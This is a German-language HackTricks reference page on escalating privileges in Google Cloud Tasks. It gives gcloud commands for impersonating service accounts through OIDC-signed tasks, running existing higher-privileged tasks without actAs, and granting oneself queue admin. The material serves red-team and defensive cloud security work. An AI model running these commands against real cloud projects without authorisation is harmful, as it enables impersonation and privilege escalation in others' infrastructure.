GCP - Cloud Tasks Privesc

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

An attacker mit diesen Berechtigungen kann sich als andere Dienstkonten ausgeben, indem er Tasks erstellt, die mit der Identität des angegebenen Dienstkontos ausgeführt werden. Dadurch können authentifizierte HTTP-Anfragen an IAM-geschützte Cloud Run- oder Cloud Functions-Dienste gesendet werden.

Cloud Task mit Service-Account-Impersonation erstellen ```bash gcloud tasks create-http-task \ task-$(date '+%Y%m%d%H%M%S') \ --location us-central1 \ --queue \ --url 'https://.us-central1.run.app' \ --method POST \ --header 'X-Hello: world' \ --body-content '{"hello":"world"}' \ --oidc-service-account-email @.iam.gserviceaccount.com ```

cloudtasks.tasks.run, cloudtasks.tasks.list

Ein Angreifer mit diesen Berechtigungen kann vorhandene geplante Tasks ausführen ohne Berechtigungen für das mit dem Task verknüpfte Service-Konto zu haben. Dadurch können Tasks ausgeführt werden, die zuvor mit höher privilegierten Service-Konten erstellt wurden.

Vorhandene Cloud Task ohne actAs permission ausführen ```bash gcloud tasks run projects//locations/us-central1/queues//tasks/ ```

Der Principal, der diesen Befehl ausführt, benötigt nicht die Berechtigung iam.serviceAccounts.actAs für das Servicekonto des Tasks. Dies erlaubt jedoch nur das Ausführen vorhandener Tasks — es gewährt nicht die Möglichkeit, Tasks zu erstellen oder zu ändern.

cloudtasks.queues.setIamPolicy

Ein Angreifer mit dieser Berechtigung kann sich selbst oder anderen Principals Cloud Tasks-Rollen auf bestimmten Queues gewähren, womit er möglicherweise auf roles/cloudtasks.admin eskalieren kann, was die Fähigkeit einschließt, Tasks zu erstellen und auszuführen.

Cloud Tasks admin role auf Queue gewähren ```bash gcloud tasks queues add-iam-policy-binding \ \ --location us-central1 \ --member serviceAccount:@.iam.gserviceaccount.com \ --role roles/cloudtasks.admin ```

Dies ermöglicht dem Angreifer, beliebigen Service Accounts, die er kontrolliert, vollständige Cloud Tasks-Admin-Berechtigungen für die Queue zu gewähren.

Referenzen

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks